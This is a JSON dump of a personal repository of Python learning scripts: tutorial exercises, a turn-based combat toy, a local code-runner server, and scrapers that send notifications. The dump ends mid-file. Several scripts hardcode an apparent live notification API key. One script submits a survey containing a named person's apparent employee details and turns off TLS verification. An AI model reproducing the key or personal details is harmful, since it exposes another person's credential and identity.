[ { "alpha_fraction": 0.3823038339614868, "alphanum_fraction": 0.4223706126213074, "avg_line_length": 14.763157844543457, "blob_id": "ce012692e29d53e6d1714ed6a4162534252114cf", "content_id": "8f62d0ed625ccd77a9ca4f7dd5241fb44b66f77e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 641, "license_type": "permissive", "max_line_length": 53, "num_lines": 38, "path": "/7generator.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-01\n#generator 生成器 (一边循环一边计算的机制,称为生成器:generator)\n\ng = (x * x for x in range(10))\nfor n in g:\n print(n)\nprint('---------------')\n\n\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\nfib(10)\n\nprint('--------------------------------------------')\n\n\ndef triangles():\n L = [1]\n while True:\n yield L\n L.append(0)\n L = [L[i - 1] + L[i] for i in range(len(L))]\n\n\nn = 0\nfor t in triangles():\n print(t)\n n = n + 1\n if n == 19:\n break\n" }, { "alpha_fraction": 0.4848484992980957, "alphanum_fraction": 0.5211039185523987, "avg_line_length": 33.867923736572266, "blob_id": "84ddd41c7bd8df7126db30a4abbd2e2ce93a3432", "content_id": "4b65cea94628408d2716007194b99f6d958bace6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1924, "license_type": "permissive", "max_line_length": 115, "num_lines": 53, "path": "/Demo/soldierAttack.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !/usr/bin/env python3\n# Power by hw 2017-01-10\n\nimport random\n\nclass Game(object):\n\n def __init__(self):\n self.Tom = {'Name': \"Tom\", 'Blood': 120, 'Attack': 40, 'Defense': 10, 'Hit': 40, 'Dodge': 20, 'Crit': 20}\n self.Jhon = {'Name': \"Jhon\", 'Blood': 150, 'Attack': 25, 'Defense': 20, 'Hit': 30, 'Dodge': 50, 'Crit': 15}\n\n def attack_behavior(self,soldierA,soldierB,count):\n print ('第%s回合...' % count)\n hitresult = soldierA['Hit'] + 50 - soldierB['Dodge'] > 100 - random.randint(0,100)\n if hitresult:\n critresult = soldierA['Crit'] > 100 - random.randint(0,100)\n if critresult:\n soldierBBlood = soldierB['Blood'] - (soldierA['Attack'] * 2 - soldierB['Defense'])\n else:\n soldierBBlood = soldierB['Blood'] - (soldierA['Attack'] - soldierB['Defense'])\n\n soldierB['Blood'] = soldierBBlood\n if count % 2 != 0:\n print('%s剩余血量:%d' % (soldierA['Name'], soldierA['Blood']))\n print('%s剩余血量:%d' % (soldierB['Name'], soldierB['Blood']))\n else:\n print('%s剩余血量:%d' % (soldierB['Name'], soldierB['Blood']))\n print('%s剩余血量:%d' % (soldierA['Name'], soldierA['Blood']))\n if critresult:\n print('%s对%s造成了双倍的伤害!!!' % (soldierA['Name'], soldierB['Name']))\n return soldierBBlood\n\n else:\n print('%s闪避了%s的攻击!!!' % (soldierA['Name'], soldierB['Name']))\n return 9999\n\n\ngame = Game()\n\ncount = 0\nflag = 1\n\nwhile flag > 0:\n count = count + 1\n if count % 2 != 0:\n result = game.attack_behavior(game.Tom, game.Jhon, count)\n else:\n result = game.attack_behavior(game.Jhon,game.Tom,count)\n print ('\\n')\n if(result <= 0):\n print ('游戏结束...')\n flag = 0\n" }, { "alpha_fraction": 0.5428571701049805, "alphanum_fraction": 0.6928571462631226, "avg_line_length": 16.625, "blob_id": "ff718d2a523dedcb38e77fa57cb5880d8bcf4ccc", "content_id": "0e4661f663add5d7a0e231eabda48a5fb0edb7ac", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "permissive", "max_line_length": 32, "num_lines": 8, "path": "/BuiltInModule/datetimeMouule.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2017-01-09\n# 内置函数 datetime\n\n\nfrom datetime import datetime\ndt = datetime(2017,4,5,16,22,54)\nprint(dt)" }, { "alpha_fraction": 0.5968483090400696, "alphanum_fraction": 0.6474064588546753, "avg_line_length": 30.06122398376465, "blob_id": "48c16b97218e05e882d17bd0a9d8baa02620c5ca", "content_id": "97406e0e86842dfa65b1e81fd9f56889a2554831", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "permissive", "max_line_length": 130, "num_lines": 49, "path": "/Demo/keygiveaway.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# /usr/bin/env python3\n# Power by zuosc\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport time\n\ndef getLastName():\n f = open('keygiveaway.txt', 'r')\n content = f.read()\n return content.strip()\n\ndef updateName(name):\n f = open('keygiveaway.txt', 'w')\n f.write(name)\n\n\ndef sengMsg(desp):\n sendurl = 'http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\n params = {'text': \"keygiveaway\", 'desp': \"游戏名称:\"+desp}\n params = urllib.parse.urlencode(params)\n urllib.request.urlopen(sendurl + params)\n\nurl = 'http://keygiveaway.com'\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'\nreq = urllib.request.Request(url, headers={'User-Agent':user_agent})\nresponse = urllib.request.urlopen(req)\nhtml = response.read().decode('utf-8')\nsoup = BeautifulSoup(html,\"html.parser\")\ntrs = soup.findAll('table')[0].findAll(\"tbody\")[0].findAll(\"tr\")\ntds = trs[0].findAll(\"td\")\nprintDes = \"\"\n\ngameType = tds[3].find(\"img\").attrs[\"alt\"]\nname = tds[5].find(\"h4\").text.strip()\nlastName = getLastName()\n\nprintDes = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\nprintDes += \"\\r\\n新获得的游戏类型是:\" + gameType\nprintDes += \"\\r\\n游戏名称:\" + name\nprintDes += \"\\r\\n上次记录的游戏名称为:\" + lastName\nprintDes += \"\\r\\n------------------------------------------------\\r\\n\"\n\nif (((gameType == \"Steam\") | (gameType == \"Othrer\")) & (lastName != name)):\n sengMsg(name)\n updateName(name)\n\nprint(printDes)\n\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 15.066666603088379, "blob_id": "941fe09072c870ee7aed4cdd10fc576c2f3f2a7b", "content_id": "e9d64dceb97f8a79a5b664b0a771efb39db3a45c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "permissive", "max_line_length": 34, "num_lines": 15, "path": "/thirdpartymodule/usepillow.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# _*_ coding:utf8 _*_\n\n'annotation: use pillow module'\n\n__author__ = 'zuosc'\n\nfrom PIL import Image\n\nim = Image.open('other.png')\nprint(im.format, im.size, im.mode)\n\n\nim.thumbnail((50, 50))\nim.save('thumb.jpg', 'png')" }, { "alpha_fraction": 0.6014198660850525, "alphanum_fraction": 0.6440162062644958, "avg_line_length": 23.549999237060547, "blob_id": "0575bb262e7c2e301414f92eb85faae4b216edab", "content_id": "b13929ac2c08bfeac1c69fe39579092482463700", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 996, "license_type": "permissive", "max_line_length": 94, "num_lines": 40, "path": "/Demo/biquge_shengxu.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !usr/bin/env python3\n# Power by zuosc\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef getLatChapter():\n shengxuAddr = 'http://www.yinyuanren.com'\n html = urllib.request.urlopen(shengxuAddr).read()\n soup = BeautifulSoup(html, 'html.parser')\n lastChapter = soup.find_all('a')[-5]['href']\n return lastChapter\n\n\ndef sengMsg(chapter):\n sendurl = 'http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\n params = {'text': \"圣墟新章节\", 'desp': chapter}\n params = urllib.parse.urlencode(params)\n urllib.request.urlopen(sendurl + params)\n\ntry:\n lastChapter = getLatChapter()\n f = open('shengxu.txt','r')\n content = f.read()\n\n if content == lastChapter:\n pass\n\n else:\n f = open('shengxu.txt', 'w')\n f.write(lastChapter)\n sengMsg(lastChapter)\n f.close()\nexcept:\n f = open('shengxu.txt', 'w')\n f.write(getLatChapter())\n f.close()\n sengMsg(lastChapter)\n\n\n\n\n" }, { "alpha_fraction": 0.3545454442501068, "alphanum_fraction": 0.44545453786849976, "avg_line_length": 14.857142448425293, "blob_id": "a8202237a63025b851d7c5566a4f1fe1315953d4", "content_id": "156554c7b4192336b816ccf8b27471fe4c1749c0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "permissive", "max_line_length": 38, "num_lines": 7, "path": "/4slice.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-09-27\n# 数据切片\n\nL = ['A', 'B', 'C', 'D' 'E', 'F', 'G']\n\nprint(L[:3])" }, { "alpha_fraction": 0.5993377566337585, "alphanum_fraction": 0.6655629277229309, "avg_line_length": 29.200000762939453, "blob_id": "94675a060ece2c455857d53a4bc31819057c7974", "content_id": "7afe9e643352205fb3d413474cc061114f077020", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "permissive", "max_line_length": 66, "num_lines": 10, "path": "/10sorted.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-13\n# 排序算法\n\nfrom operator import itemgetter\nstudents = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\nprint(sorted(students, key=itemgetter(0)))\nprint(sorted(students, key=lambda t: t[1]))\nprint(sorted(students, key=itemgetter(1), reverse=True))\n" }, { "alpha_fraction": 0.5365168452262878, "alphanum_fraction": 0.5533707737922668, "avg_line_length": 15.952381134033203, "blob_id": "199d2ca82042e346eab502382cc2ef50e5273693", "content_id": "eca1954a4bbb2964cfa1b1e4c4548c16d515b0e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 356, "license_type": "permissive", "max_line_length": 53, "num_lines": 21, "path": "/OOP/ooptest.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python3\n# _*_ coding:utf8 _*_\n\n'oop demo'\n\n__author__ = 'zuosc'\n\n\nclass Student(object):\n def __init__(self, name, score):\n self.__name = name\n self.__score = score\n\n def print_score(self):\n print('%s: %s' % (self.__name, self.__score))\n\n\nbart = Student('Bart', 59)\nlisa = Student('Lisa', 87)\n\nbart.print_score()\n" }, { "alpha_fraction": 0.5057471394538879, "alphanum_fraction": 0.6206896305084229, "avg_line_length": 16.200000762939453, "blob_id": "80ea0af736123d4feae606733b2c2a5426712751", "content_id": "1f05a91fc403fd87d9048d27163980965bd35dc6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 103, "license_type": "permissive", "max_line_length": 27, "num_lines": 5, "path": "/advancedOOP/slots.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python3\n# _*_ coding:utf8 _*_\n# Power by zuosc 2015-10-23\n\n'面向对象高级编程'\n\n" }, { "alpha_fraction": 0.6206896305084229, "alphanum_fraction": 0.746081531047821, "avg_line_length": 23.615385055541992, "blob_id": "46d1cb89e8df8061a4de02d4fc941d1a08f761ca", "content_id": "4d1c292749c4249a3f60ba0fd96ec2a315a4461c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "permissive", "max_line_length": 88, "num_lines": 13, "path": "/Demo/NotifyCrystalMine.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !/usr/bin/env python3\n# Power by zuosc\n\n\nimport urllib.parse\nimport urllib.request\n\n\nsendurl='http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\nparams = {'text':\"水晶矿场\",'desp':\"快去收钱!!!\"}\nparams = urllib.parse.urlencode(params)\nurllib.request.urlopen(sendurl+params)" }, { "alpha_fraction": 0.5910852551460266, "alphanum_fraction": 0.6405038833618164, "avg_line_length": 24.073171615600586, "blob_id": "1e98a323634b14701d1e0c90af6758a371463721", "content_id": "dc7c3dfc2d559002de90d7d20115c15660527319", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1040, "license_type": "permissive", "max_line_length": 94, "num_lines": 41, "path": "/Demo/xiaoshuo_xjzm.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !usr/bin/env python3\n# Power by zuosc\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef getLatChapter():\n addr = 'http://m.09xs.com/info-48609/'\n html = urllib.request.urlopen(addr).read()\n soup = BeautifulSoup(html, 'html.parser')\n lastChapter = soup.find_all('a')[8]['href']\n return lastChapter\n\n\ndef sengMsg(chapter):\n mAddr = 'http://m.09xs.com/'+chapter\n sendurl = 'http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\n params = {'text': \"玄界之门\", 'desp': mAddr}\n params = urllib.parse.urlencode(params)\n urllib.request.urlopen(sendurl + params)\n\ntry:\n lastChapter = getLatChapter()\n f = open('xuanjiezhimen.txt', 'r')\n content = f.read()\n\n if content == lastChapter:\n pass\n\n else:\n f = open('xuanjiezhimen.txt', 'w')\n f.write(lastChapter)\n sengMsg(lastChapter)\n f.close()\nexcept:\n f = open('xuanjiezhimen.txt', 'w')\n f.write(getLatChapter())\n f.close()\n sengMsg(lastChapter)\n\n\n\n\n" }, { "alpha_fraction": 0.30442479252815247, "alphanum_fraction": 0.3486725687980652, "avg_line_length": 24.68181800842285, "blob_id": "245a1a909a9d2fef3625a0ea39861a389beac37f", "content_id": "e560a51287e0d8c73f791893e8f87f20d786abcc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "permissive", "max_line_length": 72, "num_lines": 44, "path": "/1parameter.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-09-27\n# 函数参数的例子\n\n\ndef person(name, age, *, city, job): # 关键字参数\n print(name, age, city, job)\n\n\nperson('Jack', 24, city='beijing', job='Engineer')\n\n\n# *args是可变参数,args接收的是一个tuple\n# **kw是关键字参数,kw接收的是一个dict\ndef f1(a, b, c=0, *args, **kw):\n print('a = ', a, 'b = ', b, 'c = ', c, 'args = ', args, 'kw = ', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a = ', a, 'b = ', b, 'c = ', c, 'd = ', d, 'kw = ', kw)\n\n\nf1(1, 2)\nprint('----------------------------------------------')\nf1(1, 2, c=0)\nprint('----------------------------------------------')\nf1(1, 2, 3, 'a', 'b')\nprint('----------------------------------------------')\nf1(1, 2, 3, 'a', 'b', x=99)\nprint('----------------------------------------------')\nf2(1, 2, d=99, ext=None)\nprint('----------------------------------------------')\nargs = (1, 2, 3, 4)\nkw = {'d': 99, 'x': '#'}\nf1(*args, **kw)\nprint('----------------------------------------------')\n\nargs = (1, 2, 3)\nkw = {'d': 88, 'x': '#'}\nf2(*args, **kw)\n\nprint('----------------------------------------------')\n\nprint('对于任意函数,都可以通过类似func(*args, **kw)的形式调用它,无论它的参数是如何定义的。')\n" }, { "alpha_fraction": 0.5678980350494385, "alphanum_fraction": 0.5819458961486816, "avg_line_length": 30.252033233642578, "blob_id": "88fabf92998380da8cf2f81f83f93daffc1ca5f0", "content_id": "e8ae618db59496e82f6f368e8eff6be98ca30a36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3860, "license_type": "permissive", "max_line_length": 231, "num_lines": 123, "path": "/learning.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nr'''\nlearning.py\n\nA Python 3 tutorial from http://www.liaoxuefeng.com\n\nUsage:\n\npython3 learning.py\n'''\n\nimport sys\n\n\ndef check_version():\n v = sys.version_info\n if v.major == 3 and v.minor >= 4:\n return True\n print('Your current python is %d.%d. Please use Python 3.4.' %\n (v.major, v.minor))\n return False\n\n\nif not check_version():\n exit(1)\n\nimport os, io, json, subprocess, tempfile\nfrom urllib import parse\nfrom wsgiref.simple_server import make_server\n\nEXEC = sys.executable\nPORT = 39093\nHOST = 'local.liaoxuefeng.com:%d' % PORT\nTEMP = tempfile.mkdtemp(suffix='_py', prefix='learn_python_')\nINDEX = 0\n\n\ndef main():\n httpd = make_server('127.0.0.1', PORT, application)\n print('Ready for Python code on port %d...' % PORT)\n httpd.serve_forever()\n\n\ndef get_name():\n global INDEX\n INDEX = INDEX + 1\n return 'test_%d' % INDEX\n\n\ndef write_py(name, code):\n fpath = os.path.join(TEMP, '%s.py' % name)\n with open(fpath, 'w', encoding='utf-8') as f:\n f.write(code)\n print('Code wrote to: %s' % fpath)\n return fpath\n\n\ndef decode(s):\n try:\n return s.decode('utf-8')\n except UnicodeDecodeError:\n return s.decode('gbk')\n\n\ndef application(environ, start_response):\n host = environ.get('HTTP_HOST')\n method = environ.get('REQUEST_METHOD')\n path = environ.get('PATH_INFO')\n if method == 'GET' and path == '/':\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [\n b'<html><head><title>Learning Python</title></head><body><form method=\"post\" action=\"/run\"><textarea name=\"code\" style=\"width:90%;height: 600px\"></textarea><p><button type=\"submit\">Run</button></p></form></body></html>'\n ]\n if method == 'GET' and path == '/env':\n start_response('200 OK', [('Content-Type', 'text/html')])\n L = [b'<html><head><title>ENV</title></head><body>']\n for k, v in environ.items():\n p = '<p>%s = %s' % (k, str(v))\n L.append(p.encode('utf-8'))\n L.append(b'</html>')\n return L\n if host != HOST or method != 'POST' or path != '/run' or not environ.get(\n 'CONTENT_TYPE',\n '').lower().startswith('application/x-www-form-urlencoded'):\n start_response('400 Bad Request',\n [('Content-Type', 'application/json')])\n return [b'{\"error\":\"bad_request\"}']\n s = environ['wsgi.input'].read(int(environ['CONTENT_LENGTH']))\n qs = parse.parse_qs(s.decode('utf-8'))\n if not 'code' in qs:\n start_response('400 Bad Request',\n [('Content-Type', 'application/json')])\n return [b'{\"error\":\"invalid_params\"}']\n name = qs['name'][0] if 'name' in qs else get_name()\n code = qs['code'][0]\n headers = [('Content-Type', 'application/json')]\n origin = environ.get('HTTP_ORIGIN', '')\n if origin.find('.liaoxuefeng.com') == -1:\n start_response('400 Bad Request',\n [('Content-Type', 'application/json')])\n return [b'{\"error\":\"invalid_origin\"}']\n headers.append(('Access-Control-Allow-Origin', origin))\n start_response('200 OK', headers)\n r = dict()\n try:\n fpath = write_py(name, code)\n print('Execute: %s %s' % (EXEC, fpath))\n r['output'] = decode(\n subprocess.check_output(\n [EXEC, fpath], stderr=subprocess.STDOUT, timeout=5))\n except subprocess.CalledProcessError as e:\n r = dict(error='Exception', output=decode(e.output))\n except subprocess.TimeoutExpired as e:\n r = dict(error='Timeout', output='执行超时')\n except subprocess.CalledProcessError as e:\n r = dict(error='Error', output='执行错误')\n print('Execute done.')\n return [json.dumps(r).encode('utf-8')]\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 14.5, "blob_id": "7922a1ba50d462143bb326b1a47e121b09e80df8", "content_id": "3135d2b75f29462c15d2ace90bbb31288a702250", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31, "license_type": "permissive", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# PythonCode\nPython Study Code\n" }, { "alpha_fraction": 0.49130937457084656, "alphanum_fraction": 0.5191193222999573, "avg_line_length": 14.410714149475098, "blob_id": "ec0efe85be0b697d6db06418c2545fcdb56b83b2", "content_id": "50643b4ef5e00307557b6e4858e840cf27a4c89c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 987, "license_type": "permissive", "max_line_length": 64, "num_lines": 56, "path": "/9filter.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc\n# filter filter()把传入的函数依次作用于每个元素,然后根据返回值是True还是False决定保留还是丢弃该元素。\ndef is_odd(n):\n return n % 2 == 1\n\n\nprint(list(filter(is_odd, [1, 2, 3, 4, 5, 6, 7])))\n\n\ndef not_empty(s):\n return s and s.strip()\n\n\nprint(list(filter(not_empty, ['a', 'bb', None, 'cccc'])))\n\n# 素数的获取\n\n\ndef _odd_iter():\n n = 1\n while True:\n n = n + 2\n yield n\n\n\ndef _not_divisible(n):\n return lambda x: x % n > 0\n\n\ndef primes():\n yield 2\n it = _odd_iter() # 初始序列\n while True:\n n = next(it) # 返回序列的第一个数字\n yield n\n it = filter(_not_divisible(n), it)\n\n\nfor n in primes():\n if n < 1000:\n print(n)\n else:\n break\n\n\nprint('----------------------------------------')\n\n# 回数的获取\n\n\ndef is_palindrome(n):\n return int(str(n)[::-1]) == n\n\n\nprint(list(filter(is_palindrome, range(1, 1000))))\n" }, { "alpha_fraction": 0.6766381859779358, "alphanum_fraction": 0.747863233089447, "avg_line_length": 24.962963104248047, "blob_id": "3847cebf70241cdd66d8f9a31e8ad227f7c3501a", "content_id": "4e6107ad7eacb78e0195e1269767743daeaac59b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "permissive", "max_line_length": 88, "num_lines": 27, "path": "/Demo/Weather.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# /usr/bin/env python3\n# Power by zuosc\n\n\nimport json\nimport gzip\nimport urllib.parse\nimport urllib.request\n\n\nweatherApiAdder = 'http://wthrcdn.etouch.cn/weather_mini?'\nsuzhouKey ='101190401'\nparams = urllib.parse.urlencode({'citykey': suzhouKey})\nresult = urllib.request.urlopen(weatherApiAdder+ params).read()\njsonData = gzip.decompress(result).decode('utf8')\nprint(jsonData)\n\ndata = json.loads(jsonData)\n\ntitle = '今日天气'\ncontent = '当前温度:'+data[\"data\"][\"wendu\"]+'\\r\\n'\n\nsendurl='http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\nparams = {'text':title,'desp':content}\nparams = urllib.parse.urlencode(params)\nurllib.request.urlopen(sendurl+params)\n\n" }, { "alpha_fraction": 0.5937052965164185, "alphanum_fraction": 0.6502146124839783, "avg_line_length": 47.17241287231445, "blob_id": "9454fc3fad5dcaffc2bc09e28170c9dad07d8e97", "content_id": "51dec782115a4df07b1b434e3678ab589c856947", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1424, "license_type": "permissive", "max_line_length": 763, "num_lines": 29, "path": "/Demo/postTencent.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n# _*_ coding:utf8 _*_\n\n__author__='zuosc'\n\n\nimport urllib.request\nimport urllib.parse\nimport time\nimport ssl\nimport json\n\ntime1 = int(time.time())\ndate = time.strftime(\"%m.%d\", time.localtime()) \n\ndata = urllib.parse.urlencode({'survey_id': 923450, 'answer_survey': '{\"id\":\"923450\",\"survey_type\":0,\"jsonLoadTime\":49,\"ldw\":\"F3D636F9-7582-415F-A659-E5EE23CDDDAD\",\"time\":%d,\"ua\":\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36\",\"openid\":\"\",\"pages\":[{\"id\":\"1\",\"questions\":[]},{\"id\":\"p-2-VstM\",\"questions\":[{\"id\":\"q-1-ZzWp\",\"type\":\"text\",\"text\":\"左思成\",\"options\":[],\"blanks\":[]},{\"id\":\"q-2-Ibet\",\"type\":\"text\",\"text\":\"32137\",\"options\":[],\"blanks\":[]},{\"id\":\"q-3-qtan\",\"type\":\"text\",\"text\":\"大度假自营包团研发组\",\"options\":[],\"blanks\":[]},{\"id\":\"q-4-RhRM\",\"type\":\"text\",\"text\":\"{%s}\",\"options\":[],\"blanks\":[]},{\"id\":\"q-5-lpN1\",\"type\":\"textarea\",\"text\":\"\",\"options\":[],\"blanks\":[]}]}],\"referrer\":\"\"}' % (time1,date)})\ndata = data.encode('utf-8')\nrequest = urllib.request.Request(\"https://wj.qq.com/sur/collect_answer\")\n# adding charset parameter to the Content-Type header.\nrequest.add_header(\"Content-Type\",\"application/x-www-form-urlencoded;charset=utf-8\")\n\ncontext = ssl._create_unverified_context()\nf = urllib.request.urlopen(request, data,context=context)\n\nresponse = f.read().decode('utf-8')\n\nprint(response)\n\ntime.sleep(2)\n\n" }, { "alpha_fraction": 0.46684709191322327, "alphanum_fraction": 0.5047361254692078, "avg_line_length": 17.94871711730957, "blob_id": "f8fbca031d6ce18e5ddcbe4bf45ac5fa4fa3ebe2", "content_id": "86e71103e71ca9896cc8021d171d62304bb3f3ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 749, "license_type": "permissive", "max_line_length": 50, "num_lines": 39, "path": "/6listcomprehensions.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-01\n# 列表生成器\n\nl = list(range(1, 10))\nprint(l)\n\nL = []\nfor x in range(1, 11):\n L.append(x * x)\nprint(L)\n\nLL = [x * x for x in range(1, 11)]\nprint(LL)\n\nLLL = [x * x for x in range(1, 11) if x % 2 == 0]\nprint(LLL)\n\nLLLL = [m + n for m in 'ABC' for n in 'XYZ']\nprint(LLLL)\n\nimport os\ndirs = [d for d in os.listdir('C:')]\nprint(dirs)\n\nd = {'a': 'X', 'b': 'Y', 'c': 'Z', 'd': 'D'}\nfor k, v in d.items():\n print(k + '=' + v)\n print(k, '=', v)\n\nprint([k + '=' + v for k, v in d.items()])\n\nL = ['Hello', 'World', 'IBM', 'APPLE', 'DJ']\nprint([s.lower() for s in L])\n\nprint('---------------')\nL1 = ['HELLO', 'WORLD', 5, 'ZORRO', None]\nL2 = [s.lower() for s in L1 if isinstance(s, str)]\nprint(L2)\n" }, { "alpha_fraction": 0.3096666634082794, "alphanum_fraction": 0.3863333463668823, "avg_line_length": 17.75, "blob_id": "8ce10be9c029f922dfbdeda81c85e0b13f280361", "content_id": "d8269617c12d365ea184c788f1d901406fecf0ea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3202, "license_type": "permissive", "max_line_length": 74, "num_lines": 160, "path": "/8mapandreduce.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-12\n#map和reduce\n\n\ndef f(x):\n return x * x\n\n\nr = map(f, [1, 2, 3, 4, 5, 6, 7])\n\nprint(list(r))\n\nprint('---------------------------------')\n\nprint(list(map(str, [1, 2, 3, 4, 5, 6, 7, 8, 9])))\n\nprint('----------------------------------')\n\n\ndef add(x, y):\n return x + y\n\n\nfrom functools import reduce\n\nr = reduce(add, [1, 2, 1, 2, 2])\nprint(r)\n\nprint('----------------------------')\n\n\ndef fn(x, y):\n return x * 10 + y\n\n\nr = reduce(fn, [1, 2, 3, 9])\nprint(r)\nprint('---------------------------')\n\n\ndef fn(x, y):\n return x * 10 + y\n\n\ndef char3num(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n\nr = reduce(fn, map(char3num, '44885'))\n\nprint(r)\n\n#################################################################\n\n\ndef str2int(s):\n def fn(x, y):\n return x * 10 + y\n\n def char2num(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n#使用lambda\n#return reduce(lambda x, y: x * 10 + y, map(char2num, s))\n\n return reduce(fn, map(char2num, s))\n\nprint(str2int('123123123123'))\n\n\ndef prod(L):\n return reduce(lambda x, y: x * y, L)\n\n\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\n\n# 练习 (3)\n# 利用map和reduce编写一个str2float函数,把字符串'123.456'转换成浮点数123.456\n\n\n# 函数定义\ndef str2float(s):\n # 通过 ‘.’ 分割数字字符串,赋值对应的 ‘.’ 左右字符串变量\n l_s_int, r_s_float = s.split('.')\n # 字符串 ‘.’ 右侧长度\n r_s_len = len(r_s_float)\n\n # 字符转数字函数\n def char2int(s):\n return {'0': 0,\n '1': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9}[s]\n\n# 左侧-整数字符串转换\n\n l_transfer = reduce(lambda x, y: x * 10 + y, map(char2int, l_s_int))\n # 